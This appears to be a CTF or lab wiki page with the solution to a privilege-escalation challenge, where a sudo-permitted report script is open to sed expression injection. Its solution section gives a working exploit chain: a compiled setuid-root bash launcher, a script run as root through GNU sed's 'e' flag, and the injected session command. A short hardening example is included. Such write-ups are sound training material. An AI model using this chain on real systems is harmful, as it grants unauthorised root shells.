
Challenge 17: Replay It Again Sam

Bob Micheletto edited this page Feb 20, 2023 · 1 revision

Level: Hard

Sudo Rule: localuser17 ALL=(ALL) NOPASSWD: /bin/ls /reports/, /bin/cat, /usr/local/bin/sudo_report.sh

Notes: This script is vulnerable to sed expression injection because of the following lines:

    /usr/bin/sudoreplay -R -s 999 $2 | \
        /bin/sed -e 's,\x1B\[[0-9;]*[a-zA-Z],,g' \
        -e "s:Replaying sudo session\: ${COMMAND}::" > $TEMP

COMMAND is the command string recorded for the session; it is read unfiltered from the sudoreplay session listing (`sudoreplay -l`) by taking the sixth `=`-separated field of the line whose TSID matches:

    COMMAND=$(/usr/bin/sudoreplay -l |\
        /bin/grep TSID=${2} |\
        /usr/bin/awk -F= '{print $6}')

Because COMMAND is whatever we passed to `sudo cat`, we control the text that is expanded inside the double-quoted sed expression. A `::` closes the substitution early, after which we can append any further sed commands, including a substitution with GNU sed's `e` flag, which executes the replacement as a shell command, here as root.
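For contrast, the following is an added hardening example, not the challenge's own sudo_report.sh: the banner line is removed by an exact string comparison in awk, so the untrusted command text never becomes part of a sed or awk program. Both helper names are hypothetical.

```shell
#!/bin/sh
# Added example (not the challenge script). Two hypothetical helpers that
# close the two places where untrusted text reaches a command parser.

# sudoreplay session IDs are six alphanumeric characters. Rejecting
# anything else keeps $2 from carrying regex metacharacters into grep.
valid_tsid() {
    printf '%s' "$1" | grep -Eq '^[A-Za-z0-9]{6}$'
}

# Drop the "Replaying sudo session: <command>" banner line from stdin.
# The command is passed through the environment (ENVIRON) rather than
# -v, so awk does not interpret backslash escapes in it, and "$0 ==
# banner" is a plain string comparison: sed/awk metacharacters in the
# recorded command are inert data, never part of the program text.
strip_replay_banner() {
    REPLAY_CMD="$1" awk '
        BEGIN { banner = "Replaying sudo session: " ENVIRON["REPLAY_CMD"] }
        $0 == banner { next }   # remove only the exact banner line
        { print }
    '
}

# Constructed sample: the banner line for the payload used on this page,
# followed by two lines of session output. Only the banner is removed;
# nothing in the payload is executed.
sample_cmd='/bin/cat ::; s:.:/tmp/script.sh :e; s:asdf'
printf 'Replaying sudo session: %s\nline one\nline two\n' "$sample_cmd" \
    | strip_replay_banner "$sample_cmd"
```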

Solution:

    sudo -l
    cat /usr/local/bin/sudo_report.sh

    # setuid shell launcher; unistd.h declares setuid/setgid
    cat > /tmp/root.c << EOF
    #include <stdlib.h>
    #include <unistd.h>
    int main(void) {
        setuid(0);
        setgid(0);
        system("/bin/bash");
        return 0;
    }
    EOF

    gcc -o /tmp/root /tmp/root.c

    # script that the injected sed 'e' flag will run as root
    cat > /tmp/script.sh << EOF
    #!/bin/sh
    chown root /tmp/root
    chmod 6755 /tmp/root
    EOF

    chmod +x /tmp/script.sh
    # record a session whose COMMAND carries the sed payload
    sudo cat "::; s:.:/tmp/script.sh :e; s:asdf"
    sudo /usr/local/bin/sudo_report.sh list
    # TSID is the session ID shown for the cat session in the list output
    sudo /usr/local/bin/sudo_report.sh report TSID
    /tmp/root
    id
